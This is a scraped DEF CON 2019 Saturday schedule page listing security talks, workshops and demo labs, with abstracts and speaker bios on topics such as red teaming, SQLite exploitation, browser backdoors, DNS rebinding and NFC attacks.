Nikhil has held trainings and boot camps for various corporate clients (in US, Europe and SE Asia), and at the world's top information security conferences. He has spoken/trained at conferences like DEF CON, BlackHat, CanSecWest, BruCON, 44CON and more. He blogs at https://www.labofapenetrationtester.com/

Twitter: @nikhil_mitt
Blog: https://labofapenetrationtester.com/


Return to Index    -    Add to    -    ics Calendar file

 

RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - Saturday - 14:30-15:30


Red Team Framework (RTF)

Abstract and Bio coming soon!


Return to Index    -    Add to    -    ics Calendar file

 

SEV - Bally's Jubilee Tower - 3rd Floor - Saturday - 17:40-18:09


Saturday August 10 2019 1740 30 mins
RED TEAMING – FROM DOWN UNDER
If there is one red teaming talk you NEED TO HEAR – it is this one. BIO and Abstract coming

Wayne Ronaldson:
Wayne is an experienced tester, having conducted security assessments for a range of leading organizations. Wayne has expertise in Red Team Assessments, Physical, Digital and Social, and has presented to a number of organizations and government departments on the current and future state of the security landscape.


Return to Index    -    Add to    -    ics Calendar file

 

Workshops - ( Sold Out ) - Flamingo - Lower Level - Valley of Fire I - Saturday - 10:00-13:59


Red Teaming Techniques for Electronic Physical Security Systems

Saturday, 1000-1400 in Flamingo, Valley of Fire I

Valerie Thomas Technical Lead, Securicon

Terry Gold Founder, D6 Research

Organizations spend millions of dollars to keep their assets safe with physical security systems, but these are not without flaw. This course is designed to help you assess, strategize, and navigate your way through the complex electronic physical access control systems and into the largest enterprise organizations. In this course, we will cover enterprise architecture, access control systems, wiring, protocols, controllers, door readers, RFID technologies and techniques, magnetic stripe and PIN attacks, as well as blending social engineering attacks. With our complete physical access lab you'll get hands on experience analyzing and programming multiple RFID card formats.

Skill Level Beginner

Prerequisites: None. Previous experience is not required

Materials: For students who wish to participate in the hands-on portion, a laptop (Windows, Linux, or OSX) with at least one available USB port. Students will need local administrative privileges for software installation.

Max students: 40

Registration: https://www.eventbrite.com/e/red-teaming-techniques-for-electronic-physical-security-systems-valley-of-fire-i-tickets-63606408480
(Opens 8-Jul-19)

Valerie Thomas
Valerie Thomas is the Technical Director and utilizes her Electrical Engineering education and security consulting background to incorporate a variety of evaluation techniques specific to ICS.

Terry Gold
Terry is the founder of D6 Research, an independent security analyst firm specializing in identity credentialing, authentication and access control. Terry has spent the last 15 years specializing in large scale enterprise assessments, strategy and remediation for both information and physical security. Terry is a trusted advisor to the enterprise information security, audit, and white hat communities. He is a frequent speaker and trainer to private industry and law enforcement, and is engaged with specialized red teams and active investigations for assistance with situations that involve identity and fraud related crime and attacks.


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 1 - Saturday - 16:00-16:30


Reverse Engineering 17+ Cars in Less Than 10 Minutes

Saturday at 16:00 in Track 1
20 minutes | Demo, Tool

Brent Stone

Brent provides a live demonstration reversing engineering 17 or more unknown passenger vehicle CAN networks in under 10 minutes using new automated techniques. These unsupervised techniques are over 90% accurate and consistent when tested using production CAN networks and different driving conditions. He then introduces the Python and R code used for the demo and posted to his public GitHub repository at https://github.com/brent-stone/CAN_Reverse_Engineering. The Dissertation explaining how the code works is also posted.

Brent Stone
Dr. Brent Stone is a Cyber officer with the U.S. Military. His professional experience includes 10 years of IT and cyber work in North America, the Middle East, and Asia. The focus of his PhD research was developing AI methods to help security researchers overcome the 'security through obscurity' used in the automotive industry. He presented initial findings at the 2018 IEEE Connected and Automated Vehicles Symposium and is an active member of the Open Garage's car hacking group. He holds a B.S. in Computer Science from West Point, M.S. in IT security from Carnegie-Mellon, and PhD in Computer Science from the Air Force Institute of Technology.

Github: https://github.com/brent-stone


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 2 - Saturday - 15:00-15:45


Reverse-Engineering 4g Hotspots for Fun, Bugs and Net Financial Loss

Saturday at 15:00 in Track 2
45 minutes | Demo, Tool

g richter Senior Researcher, Pen Test Partners LLP

“5G is coming” (apparently). That probably means, over the next few years, more and more people are going to be using more and more cellular-connected devices for their day-to-day TCP/IP activities.

The problem is, a lot of existing 4G modems and routers are pretty insecure. We found critical remotely-exploitable flaws in a selection of devices from variety of vendors, without having to do too much work. Plus, there’s only a small pool of OEMs working seriously with cellular technologies, and their hardware (& software dependencies) can be found running in all sorts of places. Their old 4G, 3G and even 2G-era code is going to be running in these 5G-capable devices.

With a small sample of consumer 4G routers as examples, we’re going to talk about how malleable, frustrating, and insecure these devices are. We’ll run through a few examples of existing 4G routers, from low-end bargain-basement end-of-life-never-to-be-fixed to higher-end devices. root is a means to an end, rather than the goal.

g richter
g richter is the single-use pseudonym of a security researcher with a particular interest in embedded devices and cellular. He has done this kind of thing for money and fun for quite a while now, but before that, he also did other things that didn’t involved as many computers. At the moment he's doing this for money at Pen Test Partners.


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 2 - Saturday - 10:00-10:45


Rise of the Hypebots: Scripting Streetwear

Saturday at 10:00 in Track 2
45 minutes | Demo

finalphoenix Engineer & Hypebae

Buying Supreme is even harder when most of your competitors are AI. The era of bot purchasing has arrived and more often than not, purchasing shoes, shirts, and swag, requires shell scripting. We will look at how simplistic (and how complicated) purchasing bots have become, how to write them, and what companies are trying to do to fight them, and why they’re failing at conquering the machines.

finalphoenix
finalphoenix is a full-stack engineer who has been working on the web since man invented fire gifs. She likes React, Node, and the Unix fortune command. She specializes in web security and optimization, and in the process, discovered the dangerous world of automation to help her shop.

Twitter: @finalphoenix


Return to Index    -    Add to    -    ics Calendar file

 

PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 15:30-15:59


Sandbox Creative Usage For Fun and Pro...Blems

Cesare Pizzi, Sorint.lab

Malware analysis sanboxes are pervading our IT environments and the internet as well. So, a lot of systems are available to be used and may be abused. Let's have a look on what we can get there and get your own tools ready to express yourself in this field.

Cesare Pizzi (Twitter: @red5heep) is a computer and technology enthusiast from the early '80. Computer and programming were his hobbies and then became also a real job. On the professional side, he works from more then 20 years in IT field, covering during the years a lot of different roles: programmer, system admin, DBA and in the last years, network and security engineer and analyst.


Return to Index    -    Add to    -    ics Calendar file

 

ICS - Bally's Event Center - Saturday - 12:30-12:59


SCADA: What the next Stuxnet will look like and how to prevent it

August 10, 2019 12:30 PM

In 2019, almost a decade after the famed Stuxnet worm silently wreaked havoc on an Iranian uranium enrichment plant, SCADA vendors still have gaping holes in their PLC and HMI development environments. Our new research into 4 different PLC vendor software systems details an almost negligent lack of security standards in modern SCADA environments. This lack of security creates great opportunity for future attackers and the next high-profile attack on industrial control systems. The attack scenario cannot be understated as critical systems such as power, water, transportation, and manufacturing all rely on major PLC vendors in one way or another . We will show a theoretical attack that could have happened using recently discovered vulnerabilities and proof of concept code to disrupt a major power industrial system. We share our observations on vulnerabilities found in vendors across the board and mitigation techniques for using these required software in highly critical environments where even air-gapping is not enough to remove the threat of a remote attacker.

Speaker Information

Panelist Information

Joseph Bingham

Tenable

Before joining Tenable in 2014, Joseph worked at Symantec doing malware reverse engineering. Since joining Tenable as a reverse engineer, Joseph has developed low-level protocol functionality for Nessus, analyzed different classes of remote code execution vulnerabilities, and written many remote exploitation plugins. He has presented at VirusBulletin and BSides and has produced several publications on malware, exploitation, and reverse engineering.


Return to Index    -    Add to    -    ics Calendar file

 

CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 14:25-15:05


Speaker: James Strassburg

Twitter: @jstrassburg

Abstract: The programmability of the cloud has revolutionized infrastructure deployments at scale and, at the same time, has enabled the automation of both the attack and defense of these deployments. In this talk, I will discuss the open-source tools and the techniques that my organization has used to scale security in the cloud to keep pace with our deployments. I'll also cover how we've used automation to adapt security processes to cloud strategies such as immutable servers. Some topics include: temporal leasing of API access keys and database credentials, automation of patching groups and scans, and automated enforcement of configuration policy.

About James: James Strassburg is an experienced software engineer, architect, researcher, and speaker. He has been building distributed software systems and web applications for the past 20 years. Most recently specializing in cloud migration and search engineering, he is an automation fanatic who has also worked on systems engineering, full-stack development, information security, artificial intelligence (AI), and DevOps, and has spoken on several related topics.


Return to Index    -    Add to    -    ics Calendar file

 

Workshops - ( Sold Out ) - Flamingo - Lower Level - Lake Mead I - Saturday - 14:30-18:30


scapy_dojo_v_1

Saturday, 1430-1830 in Flamingo, Lake Mead I

Hugo Trovao Hacker

Rushikesh D. Nandedkar Hacker

The workshop aims towards making beginners aware and comfortable with various facets of Scapy and its real time usages in various task of penetration testing.

The flow of workshop will be as under:
1. Scapy basics
2. TCP Basics
3. DHCP server
4. DHCP server flooder || DNS/MDNS
5. Crafting a layer using Scapy
6. Fuzzing protocols with Scapy
7. Covert channel using Scapy
8. Scapy-radio

Added value to the workshop:

What attendees will learn:
- sending/receiving/displaying/modifying packets with Scapy
- implementing custom layers in Scapy
- implement answerMachines in Scapy
- to construct tools implementing some real life examples
- simple fuzzing through Scapy and generators
- to decode live traffic with an implemented protocol

Working in Scapy consequently attendees will learn:
- TCP basics
- DHCP/DNS/MDNS basics
- AJP13 protocol
- fuzzing
- Scapy-radio
+
Prebuilt VM containing all scripts and dependencies in place.

An ISO in progress can be found at: https://drive.google.com/open?id=1wJ9OQOAnew3upyoFdMUz1hlo0WEuogJW (/root contains install script. /src contains scripts. python-netaddr dependency needs to be installed manually as of now with apt.)

Skill Level Beginner

Prerequisites: Basics of Python scripting and networks.

Materials: For Windows users:
1. Virtualbox installed
2. Administrator privileges
3. 4GB+ RAM
4. 50 GB free space

For *nix users:
1. Virtaulbox installed (optional)
2. Root privileges
3. 4GB+ RAM
4. 50 GB free space
(In case *nix users do not want to use Virtualbox, they can run scripts directly on their boxes, provided Python and Scapy is installed there.)

Max students: 26

Registration: https://www.eventbrite.com/e/scapy-dojo-v-1-lake-mead-i-tickets-63439609580
(Opens 8-Jul-19)

Hugo Trovao
Hugo is a computer enthusiast since he was a kid and always curious to know how things worked. He liked everything related to computers. He's a researcher by passion, consultant by job and penetration tester by heart. He finds himself at peace while poking holes in applications/networks/systems, while writing security tools tailored to the assessments requirement and indeed while meditating. Always wants to known a better more efficient way of doing things.

Rushikesh D. Nandedkar
He is a security analyst. Having more than six years of experience under his belt, his assignments have always been pointed towards reducing the state of insecurity for information. His research papers were accepted at NCACNS 2013, nullcon '14 & '18, HITCON '14, Defcamp '14, BruCON '15 '16 '17 '18, DEFCON 24, x33fcon '17 & '18, c0c0n-X '17, Bsides Delhi '17, BlackHat USA '18, DEFCON 26 + Co-author of "DECEPTICON," an intelligent evil-twin. Being an avid CTF player, for him, solace is messing up with packets, frames, and shellcodes.


Return to Index    -    Add to    -    ics Calendar file

 

CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 12:00-11:59


Scrubber: An open source compilation to protect journalistic sources

No description available


Return to Index    -    Add to    -    ics Calendar file

 

BCV - Flamingo 3rd Floor - Laughlin III Room - Saturday - 12:00-12:50


Secrets Worlds in Plain Web. The BlockChain DNS.

No description available


Return to Index    -    Add to    -    ics Calendar file

 

BCV - Flamingo 3rd Floor - Laughlin III Room - Saturday - 11:35-11:59


Securing the Unknown: A Methodology for Auditing Smart Contracts

No description available


Return to Index    -    Add to    -    ics Calendar file

 

PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 14:30-14:59


Security to Make the CFO Happy

Adam, Engineer

As a security professional you're hungry to learn everything you can but training isn't quite free. Meanwhile, your boss, and the bosses in a bunch of other business units are fretting all they can about DoD 8570, just one more "unfunded mandate". How does anyone justify the cost of these nonfunctional requirements? This talk will draw some indirect lines in the org chart and cite documentation in various parts of a company to show how training can be a win for the entire organization.

Adam is an engineer. Several years ago, Adam's program got whacked with the compliance stick. If Adam wanted to fly he had to comply. In an odd turn of events, Adam found that all this security compliance made him level-up his systems engineering game. After satisfying a number of security "one-offs", Adam started to realize where non-engineers had strengths and willingness to bolster his program's overall security. As a lonely security engineer in a feature-driven world he credits the infosec community for providing so much "professional development". He is happy to show engineers how fun (less painful?) security can be. Tragically, he has yet to meet anyone who can wrestle failed vuln scanners as well as he can - but he knows that special someone is out there.


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 1 - Saturday - 14:00-14:45


SELECT code_execution FROM * USING SQLite;—Gaining code execution using a malicious SQLite database

Saturday at 14:00 in Track 1
45 minutes | Demo, Tool, Exploit

Omer Gull Security Researcher at Check Point Software Technologies

Everyone knows that databases are the crown jewels from a hacker's point of view, but what if you could use a database as the hacking tool itself? We discovered that simply querying a malicious SQLite database - can lead to Remote Code Execution. We used undocumented SQLite3 behavior and memory corruption vulnerabilities to take advantage of the assumption that querying a database is safe.

How? We created a rogue SQLite database that exploits the software used to open it.Exploring only a few of the possibilities this presents we’ll pwn password stealer backends while they parse credentials files and achieve iOS persistency by replacing its Contacts database…

The landscape is endless (Hint: Did someone say Windows 10 0-day?). This is extremely terrifying since SQLite3 is now practically built-in to any modern system.

In our talk we also discuss the SQLite internals and our novel approach for abusing them. We had to invent our own ROP chain technique using nothing but SQL CREATE statements. We used JOIN statements for Heap Spray and SELECT subqueries for x64 pointer unpacking and arithmetics. It's a new world of using the familiar Structured Query Language for exploitation primitives,laying the foundations for a generic leverage of memory corruption issues in database engines.

Omer Gull
Omer Gull is a vulnerability researcher in the Malware and Vulnerability Research group at Check Point Software Technologies.

Omer has a diverse background in security research, that includes web application penetration testing, RE and exploitation.

He loves Rum, Old School Hip-Hop and Memory Corruptions.

Twitter: @GullOmer


Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 6 - Saturday - 14:00 - 15:50


Shadow Workers: Backdooring with Service Workers

Saturday from 14:00 – 15:50 in Sunset 6 at Planet Hollywood
Audience: Offensive Security, AppSec

Emmanuel Law & Claudio Contin

This presentation is focused around Shadow Workers, a tool that came out of our research on service workers. Service Workers are a new addition to modern browser and often used to extend offline capabilities to a website. With this tool, we weaponized service workers to include the ability to implant a pseudo backdoor in the browser and ghost through a victim's browser session to sniff, manipulate, and even proxy data silently. We'll demo the various persistence mechanisms our tool provides to keep service workers alive and demo how MITM can be done at the browser layer.

https://github.com/shadow-workers/shadow-workers

Emmanuel Law
Emmanuel Law (@libnex) is currently a security engineer in the Bay Area. He spends his free time researching news ways to break stuff and has presented at various international conferences such as Black Hat Arsenal, Ruxcon, Kiwicon, Troopers etc.

Claudio Contin
Claudio Contin (@claudiocontin) is a security consultant with ZX Security in Wellington, New Zealand. Before working in security, he spent several years developing web applications. He has presented at Bsides SF, Kiwicon and OWASP conferences. During his free time, he contributed to various open-source projects such as BEeF framework and Gophish.


Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 5 - Saturday - 14:00 - 15:50


Shellcode Compiler

Saturday from 14:00 – 15:50 in Sunset 5 at Planet Hollywood
Audience: Anyone interested in shellcode development

Ionut Popescu

Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows and Linux. It is possible to call any Windows API function or Linux syscall in a user-friendly way. The tool allows users to write custom shellcodes by providing an easy way to call functions or system calls. It does not have all the capabilities of a compiler, but it simplifies a lot the shellcode development process. There is no need to write assembler, it is only required to declare and call functions or system calls. Under the hood there is, of course, a custom compiler which compiles C/C++ style code into ASM which is later assembled using Keystone framework. Before the tool presentation, we will go into a deep dive on the shellcode development process for both Windows and Linux (32 bits only to keep it short and simple).

https://github.com/NytroRST/ShellcodeCompiler

Ionut Popescu
Ionut Popescu works as a Product Security Engineer for UiPath. His focus lies on web application penetration testing, source code review, security architecture review and providing security trainings. In his free time, he also likes to do research focusing on Windows internals, ASM and exploit development. Ionut is a regular speaker at different conferences, e.g. Defcon, Defcamp or OWASP.


Return to Index    -    Add to    -    ics Calendar file

 

RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - Saturday - 09:00-09:59


SiestaTime, A Red Team Automation Tool for Generation of Long-term Implants and Infrastructure Deployment  

Red Team operations require substantial efforts to both create implants and a resilient C2 infrastructure. SiestaTime aims to merge these ideas into a tool with an easy-to-use GUI, which facilitates implant and infrastructure automation. SiestaTime allows operators to provide registrar, SaaS and VPS credentials in order to deploy a resilient and ready to use Red Team infrastructure in less than five minutes. The generated implants will blend-in as legitimate traffic by communicating to the infrastructure using SaaS channels (e.g. GMail, Twitter). Use your VPS/Domains battery to deploy staging servers and inject your favorite shellcode for interactive sessions, clone sites and hide your implants ready to be downloaded, deploy more redirectors if they get busted‚ SiestaTime is built entirely in Golang, with the ability to generate Implants for multiple platforms, interact with different OS resources, and perform efficient C2 communications. Terraform will help to deploy/destroy different Infrastructure.

About Alvaro Folgado: Rebujacker works as a Product Security Engineer at Salesforce. He has multiple years of experience performing penetration tests, security assessment against different technologies, building automation tools for this purpose and performing application level researches. In the recent years his field of study has been focused into red teaming and automation. The combination of his application level and offensive security knowledge leads him to build better and stealthier implants that blends-in with nowadays cloud infrastructure and application stack of targeted organizations. Twitter: @rebujacker


Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 4 - Saturday - 14:00 - 15:50


SILENTTRINITY

Saturday from 14:00 – 15:50 in Sunset 4 at Planet Hollywood
Audience: Offense

Marcello Salvati

SILENTTRINITY is an asynchronous post-exploitation agent powered by Python, IronPython, C# and .NET's DLR (Dynamic Language Runtime), it attempts to weaponize and demonstrate the flexibility that BYOI (Bring Your Own Interpreter) payloads have over traditional C# implants. What are BYOI payloads? Turns out by harnessing the sheer craziness of the .NET framework, you can embed entire interpreters inside of .NET languages allowing you to natively execute scripts written in third-party languages (like Python) on windows! Not only does this allow you to dynamically access all of the .NET API from a scripting language of your choosing, but it also allows you to still remain completely in memory and has a number of advantages over traditional C# payloads! Essentially, BYOI payloads allow you to have all the "power" of PowerShell, without going through PowerShell in anyway! Additionally, you can nest multiple interpreters within each other to perform what I've coined "engine inception"! If you're interested in bleeding-edge and out of the ordinary C#/.NET offensive trade-craft, this is the demo for you!

https://github.com/byt3bl33d3r/SILENTTRINITY

Marcello Salvati
Marcello Salvati (@byt3bl33d3r) is a Security Analyst at BlackHills Information Security by day and by night a tool developer who discovered a novel technique to turn tea, sushi, alcohol and dank memes into somewhat functioning code. His passions include anything Active Directory related, trolling people on GitHub and developing open-source tools for the security community at large which he’s been doing for the past several years, some of his projects include SilentTrinity, CrackMapExec, DeathStar, RedBaron and many more.


Return to Index    -    Add to    -    ics Calendar file

 

CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 17:00-16:59


Snoop all Telegram messages

No description available


Return to Index    -    Add to    -    ics Calendar file

 

PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 11:00-11:59


Solving Crimes with Wireless GeoFencing and Multi-Zone Correlation Analytics

Gleb Esman, Senior Project Manager, Fraud Analytics and Research at Splunk Inc.

The presentation will introduce viewer to geofencing - the technique successfully used by law enforcement agencies to pinpoint suspects in an array of anonymous metadata coming from wireless devices. The presentation will teach viewer how to build such system from scratch using freely downloadable analytical tools. Different ways to visually define GeoFencing zones and investigation constraints will be explained. Samples of working scripts, search queries, data formats and working dashboard layouts will be provided.

Gleb Esman (Twitter: @gesman) helps to guide research, product planning and development efforts in the areas of fraud detection, data security analytics and investigations at Splunk Inc. Currently Gleb manages number of security projects in healthcare space such as drugs and opioids diversion platform and healthcare privacy monitoring platform. Before Splunk Gleb was engaged at Morgan Stanley overseeing fraud detection platform and enterprise wide data analytics systems within retail banking space. During his career, Gleb worked in a various positions at a number of enterprises involved in research and development of solutions against advanced malware and computer viruses as well as solutions for secure payments and data protection in e-commerce space. Gleb is an author of several patents in Deep Learning, Security, Behavior Biometrics and Healthcare Data Analytics.


Return to Index    -    Add to    -    ics Calendar file

 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 10:15-10:59


10:15 AM: Spectra: Open Biomedical Imaging
Speaker: Jean Rintoul

Abstract: Biomedical Imaging has previously been expensive and near impossible to hack and experiment with. If more people experimented and understood how imaging works we could move it forward much faster and make these transformative technologies available to everyone. In this talk I'll present Spectra: a tiny 2" device that uses safe levels of AC current to recreate an image of any conductive material such as your lungs, arm or head, using the same tomographic reconstruction technique as a cat scan.

Speaker Bio: Jean Rintoul wants to push forward a health technology commons. Previous experiences include bringing consumer electronic biosensor products to market from the Emotiv BCI to the Basis watch and Kiddo biosensor watch, and being published for her work in Cognitive Neuroscience in Nature.

T: @jeantoul

Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 4 - Saturday - 10:00 - 11:50


Srujan: Safer Networks for Smart Homes

Saturday from 10:00 – 11:50 in Sunset 4 at Planet Hollywood
Audience: Defense, Network, Hardware, IOT Security

Sanket Karpe & Parmanand Mishra

Srujan is a new type of network segregation system, based on Raspberry Pi, that can be easily deployed on home networks. It allows home users to segregate the devices connecting to their home networks based on the threat profile. User can keep their smart home devices separate from their computers and mobile devices to mitigate risk of cross infection from low-trust devices like smart cameras, speakers and thermostats. Srujan was created to address the challenges around the plethora of IOT devices being deployed in smart homes that are vulnerable and do not receive patches. Srujan can intelligently segregate the home network into different zones based on the device type. It automatically identifies and alerts users when the IOT devices attempt to contact any IP or domain which has been blacklisted by Google Safe Browsing.

Srujan provides the following features:

-- Intelligent segregation of devices based on their type
-- Ability to create network usage stats for each device
-- Ability to quarantine untrusted devices
-- Easy to integrate with SIEM
-- Ability to lookup IP/Domain against Google Safe Browsing.
-- Integration with ANWI (All New Wireless IDS)
-- Prevent call-home pings to manufacturer for enhanced privacy.

Sanket Karpe
Sanket Karpe is a security researcher with over decade of experience on reverse engineering malware and incident response. He is currently working as a Manager, Malware Research at Qualys Inc where his primary responsibilities include malware analysis, creating new malware detection techniques and tools development. He is the author for ANWI - All New Wireless IDS and likes to work on various IOT projects in his free time.

Parmanand Mishra
Parmanand Mishra is a security enthusiast who is currently working as Senior Malware Researcher at Qualys Inc. He works on malware analysis and adversary simulation based on ATT&CK and loves creating tools on the same. He has spoken at security conferences like c0c0n and goes by Kart1keya on Github.


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 4 - Saturday - 13:00-13:45


SSO Wars: The Token Menace

Saturday at 13:00 in Track 4
45 minutes | Demo, Tool, Exploit

Alvaro Muñoz Software Security Researcher @ Fortify (Micro Focus)

Oleksandr Mirosh Software Security Researcher @ Fortify (Micro Focus)

It is the year 2019. Humanity has almost won its long-standing war against Single-Sign On (SSO) bugs. The last of them were discovered and eradicated some time ago and the world is now living in an era of prosperity while the Auth Federation enjoys peaceful CVE-free times. However, while things seem to be running smoothly, new bugs are brewing at the core of major implementation libraries. This is probably the last chance for the evil empire to launch a world scale attack against the Auth Federation.

In this talk, we will present two new techniques:

  • 1) A new breed of SAML implementation flaws that break XML signature validation and enable arbitrary modification of the SAML assertion, which enables attackers to authenticate as arbitrary users or grant themselves arbitrary authorization claims. Although any implementation may be affected by this flaw, we will show how it affects Microsoft Windows Identity Framework (WIF) applications, Windows Communication Foundation (WCF) web services, and flagship products such as SharePoint and Exchange Servers.
  • 2) A bug in the .NET crypto library, which may allow attackers to gain Remote Code Execution (RCE) or Denial of Service (DoS) depending on the availability of code gadgets in the target server.

A new tool to detect this type of vulnerability will also be discussed and released.

Alvaro Muñoz
Alvaro Muñoz (@pwntester) is Principal Security Researcher at Micro Focus Fortify where he researches new software vulnerabilities and implement systems to detect them. His research focuses on web application frameworks where he looks for vulnerabilities or unsafe uses of APIs. Before joining the research team, he worked as an Application Security Consultant helping enterprises to deploy application security programs. Muñoz has presented at many Security conferences including BlackHat, DEF CON, RSA, OWASP AppSec US & EU, JavaOne, etc and holds several infosec certifications, including OSCP, GWAPT and CISSP. He plays CTFs with Spanish int3pids team and blogs at http://www.pwntester.com.

Twitter: @pwntester
Website: http://www.pwntester.com

Oleksandr Mirosh
Oleksandr Mirosh has over 11 years of computer security experience, including vulnerability research, penetration testing, reverse engineering, fuzzing, developing exploits and consulting. He is working for Fortify Software Security Research team in Micro Focus investigating and analyzing new threats, vulnerabilities, security weaknesses, new techniques of exploiting security issues and development vulnerability detection, protection and remediation rules. In the past, he has performed a wide variety of security assessments, including design and code reviews, threat modelling, testing and fuzzing in order to identify and remove any existing or potentially emerging security defects in the software of various customers.

Twitter: @olekmirosh


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 3 - Saturday - 15:00-15:45


State of DNS Rebinding - Attack & Prevention Techniques and the Singularity of Origin

Saturday at 15:00 in Track 3
45 minutes | Demo, Tool

Gerald Doussot Principal Security Consultant, NCC Group

Roger Meyer Principal Security Consultant, NCC Group

Do you want to know how you can exploit DNS rebinding 10x faster, bypass prevention mechanisms, interactively browse the victim's internal network, and automate the whole process during your next red team exercise?

This talk will teach you how and give you an easy-to-use tool to do it.

First, we will cover in detail the subtleties that make DNS rebinding attacks more effective in practice, including techniques and operational conditions that make it faster and more reliable. We'll also explain how to bypass commonly recommended security controls, dispelling attack and defense misconceptions that have been disseminated in blogs and social media posts.

This talk will include a number of demos using Singularity, our open source DNS rebinding attack framework that includes all the parts you need to get started pwning today, including:

  • Remote code execution and exfiltration payloads for common dev tools and software
  • Practical scanning and automation techniques to maximize the chance of controlling targeted services

We'll also show an interesting post-exploitation technique that allows you to browse a victim browser network environment via the attacker's browser without the use of HTTP proxies.

You'll leave this talk with the knowledge and tools to immediately start finding and exploiting DNS rebinding bugs.

Gerald Doussot
Gerald Doussot is a Principal Security Consultant at NCC Group, with over 20 years experience in information technology. Gerald has undertaken defensive and offensive security roles, including the design, implementation and management of security solutions, software development, integration and security Testing.

Roger Meyer
Roger Meyer is a Principal Security Engineer at NCC Group with extensive experience in managing and leading complex engagements. Roger specializes in web application security, network penetration testing, configuration reviews, and secure software development and architecture design.


Return to Index    -    Add to    -    ics Calendar file

 

PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 17:00-17:59


State Sponsored Hacking: How to Intercept/Decrypt TLS Traffic and How to Prevent TLS Interception Attacks

Chris Hanlon, Agile Data Security Ltd.

Recent reports of the Global DNS Hijacking Campaign campaign show state sponsored attackers using Man In The Middle attacks to generate fraudulent TLS certificates and intercept web traffic. In this presentation, we show the audience how they can perform similar attacks and use the certificates to intercept web traffic, emails or their coworker's VPN credentials. After demonstrating ways to trick 3 different certificate authorities into generate fraudulent TLS certificates, we explain simple ways to prevent these attacks.

Chris Hanlon (Twitter: @ChrisHanlonCA) runs an Information Security Consulting Business where he monitors and protects Endpoints, Routers, Servers, and Cloud Systems. In addition to protecting infrastructure, Chris also coaches software companies on ways to minimize vulnerabilities in their code, and reduce their vulnerability to social engineering attacks. During his "free time", Chris finds/reports security vulnerabilities, hosts hack-a-thons, uses real world exploits to help developers understand security vulnerabilities, lectures at colleges, presents at conferences, organizes security conferences, and volunteers on the presentation review board for for a BSides Conference.


Return to Index    -    Add to    -    ics Calendar file

 

CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 16:00-15:59


Stop Facebook From Buying Your Brain: Facial Recognition, DNA, and Biometric Privacy

No description available


Return to Index    -    Add to    -    ics Calendar file

 

CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 12:00-11:59


Stop right now! Quantum-Safe Instantaneous Vehicle to Vehicle communication

No description available


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 3 - Saturday - 13:00-13:45


Tag-side attacks against NFC

Saturday at 13:00 in Track 3
45 minutes | Demo, Tool

Christopher Wade

This talk covers tag-side attacks against NFC communication protocols, including cracking of Mifare encryption keys and performing targeted attacks against NFC readers. In addition, it will cover the design and creation of devices capable of emulating NFC tags down to the raw protocol using standard components and tools, with no abstraction to dedicated hardware, covering and expanding on the capabilities of available products. This talk will contain how 13.56MHz NFC works at a raw level, how tools can be built for analysing it, how the protocol can be implemented in full on standard Microcontrollers, and the security weaknesses present in its design.

Christopher Wade
Chris is a seasoned security researcher and testing consultant. His main focuses are in reverse engineering hardware, fingerprinting USB vulnerabilities and playing with Software Defined Radios, with his key strength lying in firmware analysis, which he utilises as part of the hardware testing team at Pen Test Partners.

Twitter: @Iskuri1
Github: https://github.com/Iskuri


Return to Index    -    Add to    -    ics Calendar file

 

BCV - Flamingo 3rd Floor - Laughlin III Room - Saturday - 14:15-15:59


Take back control of user data with the decentralized cloud

No description available


Return to Index    -    Add to    -    ics Calendar file

 

SEV - Bally's Jubilee Tower - 3rd Floor - Saturday - 18:50-19:20


Saturday August 10 2019 1850 30 mins
The Aspie’s Guide to Social Engineering Your Way Through Life
CPerry Carpenter, Chief Evangelist & Strategy Officer for KnowBe4 will discuss how he, both knowingly and unknowingly, ethically used Social Engineering skills all throughout his career to be successful.

He hopes to teach and encourage others who struggle socially how to grow their careers by leaning into their personal differences. And to find the strengths embedded in those differences.

Perry Carpenter: @perrycarpenter
Perry Carpenter is the author of, “Transformational Security Awareness: What Neuroscientists, Storytellers, and Marketers Can Teach Us About Driving Secure Behaviors” from Wiley Publishing, and he currently serves as Chief Evangelist and Strategy Officer for KnowBe4, the world’s most popular security awareness and simulated phishing platform.

Previously, Perry led security awareness, security culture management, and anti-phishing behavior management research at Gartner Research, in addition to covering areas of IAM strategy, CISO Program Management mentoring, and Technology Service Provider success strategies. With a long career as a security professional and researcher, Mr. Carpenter has broad experience in North America and Europe, providing security consulting and advisory services for many of the best-known global brands.

Perry holds a Master of Science in Information Assurance (MSIA) from Norwich University in Vermont and is a Certified Chief Information Security Officer (C|CISO).


Return to Index    -    Add to    -    ics Calendar file

 

PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 19:00-19:59


The Cyberlous Mrs. Maisel: A Comedic (and slightly terrifying) Introduction to Information Warfare

J. Zhanna Malekos Smith, Duke Law School

